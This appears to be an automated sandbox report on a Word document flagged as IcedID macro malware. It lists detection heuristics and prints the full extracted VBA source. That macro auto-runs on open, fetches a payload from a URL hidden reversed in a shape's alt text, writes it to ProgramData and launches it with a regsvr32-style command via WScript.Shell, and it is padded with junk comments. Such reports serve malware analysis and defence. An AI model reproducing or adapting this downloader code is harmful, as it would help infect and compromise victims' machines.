MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set wNXhE = CreateObject("Script" + XyYeT) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11682 bytes |
SHA-256: 711742aebdac67cc97fff7d035529c1f6aebeef013a0ebef86bc7bd4df780584 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sgCej"
Sub zMYMk(jPBDB, Optional ByVal uoksw As String = "c:\programdata\MrUJO.txt", Optional ByVal XyYeT As String = "ing.FileSystemObject")
' Narcosis
' Unbiassedly
' Courthouse importance
' Abnormality damn subpoenaed
' Conceptualisation shortcoming hatchbacks
' Uncrackable humanise
' Concuss battled theologists buddy harvester
' Humankind angle
' Cheeses
' Exhibitor instantly abhorred
' Noxiously
' Nutrients
' Sunbeams me
' Callowness eager
Set wNXhE = CreateObject("Script" + XyYeT)
' Returnees breakfasts deprecation occurred peachiest robbing
' Differential scurry
' Headman shingles alkali
' Cordage esthete discus polysyllable emphasising hatless
' Bread chatting cognisance
' Rotationally confirmations
Set rlJnY = wNXhE.CreateTextFile(uoksw)
' Predictors
' Ablates nobility greengages
' Gyro treating resolvable viscose
' Titans gashed unpunished breakneck
' Cockatrice overact altimeters
rlJnY.WriteLine jPBDB
' Chippings conclude perdition
' Preliminaries fatigued
' Sods arose slaving villagers
' Twined uncheckable his furry mac
' Weightlifter ascender piece pouring
rlJnY.Close
' Effusion dioxin
' Recombine transfers
' Scooping queasy wearily
' Cayman trickier blameable
' Broody crazed appearances
' Precisely incandescent
' Custodians consistency meddlers
' Rightwinger impassioned
' Tribesman sentencing fluorocarbon peer
' Enclose ramification translatable juggle
' Sleepless nabbed arrowhead
' Malachite apologia
' Ardently uncover aristocrat undercoating
' Nostalgic workhorses numbly
' Dueller proletarians
' Denver odourless cubs airing annihilating
' Dressings becks owlish
' Judge welltimed hypocrites enjoyments
' Asserted etymologists trends
' Resettling screamer
' Illtreated unsustainable unsteadily
' Boo
' Moments sounds metallurgy
' Column
' Sparetime drubbed beadyeyed
' Looney weighbridge obscureness
' Sigmoid midmost kindliest mutely
' Speeches doings manly homosexuality
' February magnetodynamics
' Emotionally replaces castigate radon aptly laboured
' Requite targeted differing premiums
' Entices arts pharmaceutical
End Sub
' Posthumous wavered eyesight extending
' Indoctrination skyward beefcake motorways
' Bedfellow dont futurism sensational
' Unbolt unobtainable alternates
' Maturing delaying
Sub AutoOpen()
' Tempters blotch warmonger
' Forewarning poultice springiest inks presupposition
' Picnickers
' Propagated limitless thursday
' Soots machinist worksheets transfigured
' Eight barbarians bevel underestimates
' Facility lazily
' Debts limelight flanking
' Midafternoon treble ranging footrest
' Utilitarianism frustrates geomorphological stained
' Justifiability slump
' Traumatise milan
' Apprehended patriotism devises conformation prodigies strategy parentheses
' Privatised aeronautic appraisingly gunning land
' Condense stuffier tidbit stoolpigeon regurgitation
' Blatant
' Diploma boating virology
' Heredity nils newsletter mangled independence industrialised hydra
' Malays wheelers impedimenta valuta
' Foreshores bludgeoned
' Cheap
' Memphis gatecrashing stipulation
' Enshroud recollecting
Dim pyCxX As New FMZUk
' Bramble manages sapient slumbering devolved amicability
' Stapler willow ideologue citrons
' Impartially lemon oiliest
' Reformulating godfather
jPBDB = pyCxX.VhfkK("MSXML2.serverXMLHTTP")
' Mountaineers dedicated
' Consular fab gall
' Decoding deformed antonyms prioritises
' Hornets ox strippers boozed
' Organic fullmoon clans overreach petunia exorcisms
zMYMk YXqlK(jPBDB)
' Carnages singularisation
' Outwitting circumlocution mediates oodles
' Redhanded
' Trumpeted workbench winder unhesitating
' Crummy purveyors exalted berlin
' Terminations beasts defraud flat invaders ante
' Explosive relives easing vastness
' Quietus simmered
' Budging farce hacksaw ionised pronto generalising
' Dimorphism landholdings
' Fielders desiring
' Orchestrations
vxDJF kBNex(0) + "vr32 c:\programdata\MrUJO.txt", "ws"
End Sub
Function wijDG(sYBQC, RLAEI)
' Expurgating
' Strengthens uplifted woodpile
' Harkened judgements
' Shrouds contraindications fingertips vixens ambulant
' Eras gilds dinosaurs terrible
' Type haematological snowdrift sureties grumpy
' Accords alimony consoled cults
wijDG = Split(sYBQC, RLAEI)
End Function
Attribute VB_Name = "wMBfi"
' Set reconversion supermodels
' Distinguishing activism leafless
' Fakers
' Moistening
Function YXqlK(CuKsR)
' Recoded nipples
' Awkwardly kennels helplines interpretational bloodline
' Overspent psychiatrist conservatoire thrush levies
' Peri packable livings
' Flippable capping greatly
' Scheduler centric racists ecstasies
' Trickiest picnicked dumfounding boisterous
YXqlK = StrConv(CuKsR, vbUnicode)
' Ester
' Judiciaries accumulated churning
' Ransomed discomfort
' Lowkey kneedeep remove portrayed
' Incited banality
End Function
' Cocoons think superciliously biosynthesis
' Culmination conductress shopkeeping embarrassment
' Scubas sacred housewife
' Fascinations lay adhesiveness
' Blowup
' Affordable evacuation sisterly
Function JmLHe()
' Hooking cooperated
' Beer heron panjandrum shortcrust bafflingly
' Peking
' Bullocks frustrate internalises broadband
' Cost demographer gondola verandahs anthropic
' Firebombing breccias stabs gravestone sequencers endorses
' Pattern
' Array airwaves
' Cask remaps remanded delict adolescence
' Dragonfly consolations differentiate
' Whiter lambswool shivered participles
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Thunderbolts millstones accommodating
' Climax regattas peddled valhalla divorces
' Company disincentive monocled aspirations franc
' Backrest diffracting earpieces straitjacket perfusion
' Ironmongery behest shouldered reaffirms
' Resolvers reselling dweller calcareous
' Rayed
Function kBNex(TtGdO)
' Blabber slavering disbandment
' Locket nocturne
' Puny
' Serialisation workforces girdled jointing
' Diplomatically mortification motocross
' Paddler facilitate shortening mistreatment candidature
' Phoney caterwauls emissions bashing
' Disaffected
' Antiquaries atomically environmentalists ferry
' Hesitates italian inoperative amicably unsung
aUFwT = JmLHe()
cTrvA = wijDG(aUFwT, "###")
dCMyY = cTrvA(TtGdO)
kBNex = dCMyY
End Function
Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Gorgons pharmacy
' Wrecked mystifies emancipating lobs
' Reconfigures postage proctor glaciologists sermon
' Recoverable metaphysical ongoing atonement spay
' Eden meaning highlight
' Discontinuities damages perniciousness waddle
Function VhfkK(MjLPR)
' Whisking masts
' Yardage worshipping menhir releases gamers unattained
' Unpredicted stoning
' Abrasively comport erred
' Opposite zoology images fetishes booklet
' Educated
Dim eFBsp As Object
' Objective mindful removing sexism
' Foothills ragstoriches
' Egomaniacs beckon unreleasable consequences intact
' Rugby wireless principalities
' Exploiting flatus onagers
' Jawbone manuscript
' Petite castling require unscrewing
' Extradite headpiece unshod
' Abducting stressed
' Pivotal warhead stirring undermines
' Neuter dehydrated sense unturned
Set eFBsp = CreateObject(MjLPR)
' Fetters sectors charitable
' Choirboys peculiarities extolling
' Musicology runner inimitable vehicular
' Biblical obstacle burdock
' Hallucinating totals undergone unattractive sheepskins
' Ingots governs luna riders guanaco boxoffice
' Toasty
' Outpatients beau active barren neared reticular
' Packets sumptuousness
' Tunable curates hatchets arbitrariness
' Toasty slovenly gnawing faultless
' Sixpence frighteners
' Eh rockfall unsettle layman
' Fluids conspiring
' Insolent thoughtless trussed
' Hail deformities enmeshed adduce
' Twee carcases refines
' Hiatuses garnering
' Irrevocable vims dabbled tuners
' Warping transparency artichoke
' Isolates inessential napkins familiarities southward
' Zig goblin sanctified promotions reprint
' Cousinly
bNZVC = kBNex(1)
' Gadgetry linnet
' Swinger
' Wakens spaniels orations
' Gallstones tildes hollows
' Increments cloning
eFBsp.Open "GET", Reverse(bNZVC), False
' Rotor washerwoman rotations comparative complicit inuits
' Expressionistic arsonists
' Moral vinegar lookalikes sitters exemplary
' Associatively twinge forthcoming outages externally contiguity
' Winter nutritionally arboreal
' Blubbered
eFBsp.Send
' Realigned loping mint cringed snowdrops
' Correlating satyrs zesty bushmen
' Hawaiian sword consolidate priorities steeps stirrer
' Pollarded
' Infinities doctored expanding
' Slumps squelch
' Degraded owlet
VhfkK = eFBsp.responsebody
End Function
Attribute VB_Name = "HGhgQ"
Sub vxDJF(FtfkY, uwmNS)
' Indoctrinated
' Insurance notices wherein scowls retransmission undernourishment bitchy
' Deed buffering digests quartered stopped
' Disowning gumboots politeness neonatal obscenely
Set eGqAM = CreateObject(uwmNS + "cript.shell")
' Wriggle
' Chatterbox editable piteously foregrounding
' Overreacting brutes distinct aortas
' Fief parson charisma passable
' Commutation
' Emulated hoped jamboree heist tuns
' Idlers
' Subalterns quorum products
' Generating onesided obscurity amphetamines
' Birefringence obeyed colitis bargains antechamber walkabouts argent empiricist
' Liqueur go wrestled
' Mismanagement absolving ridiculing furriest diode
' Implementers rootings
' Surmount position invertible humanly moves
' Detractor
' Shoulder shimmer
' Initiate gourd auxiliaries scatter dullard layering
' Developmentally confide
' Courtesans barefoot reconfiguring bloomed modifies houseflies
' Passers refuses
' Festered sidelong appraisals sorter presuppose commuted rinds
' Turncoats outages
' Chronicled silenced contort christen briefly
' Gargles resembles tractable peccary
' Undertones reset half snowy causing amir
' Looking
' Analyses slanted
' Donkey urbane bonding beanpole numberplate
' Heroic farflung
' Enigmas nudge uprooted evangelise
' Eliminates portly tufted scrawling
' Unleash
' Crocuses silicate jug revolutionising
' Snail unbuckled bureaucracy
' Generalist unravelling
' Script eradicated
' Bathed largeness
' Stretchy
' Necrophiliac repenting workhouses blackness gnaws abut
' Legends wristbands
' Sergeant jot cursor echidna
' Unsubtly userfriendly intrusions recomputes waste if
' Cultus bee buzzes wrapped
' Percussive newsworthy yellow
' Transparency genera cytotoxic alluvial
' Moorland beadings
' Samoa
' Furtively creatable
' Averting stimuli nutshell
eGqAM.exec FtfkY
' References
' Wallow arisen cymbals
' Retitling manciple frameup ploughshares
' Bulldoze pimpernel
' Uncooked whinnied grandmother
' Shoot matriarchal wrongdoing found derisory testified
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes |
SHA-256: 11d3bddf1588d98eadb6b3847bd9acc0671c63b3619b5fb60edb3ecb4342b02d |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.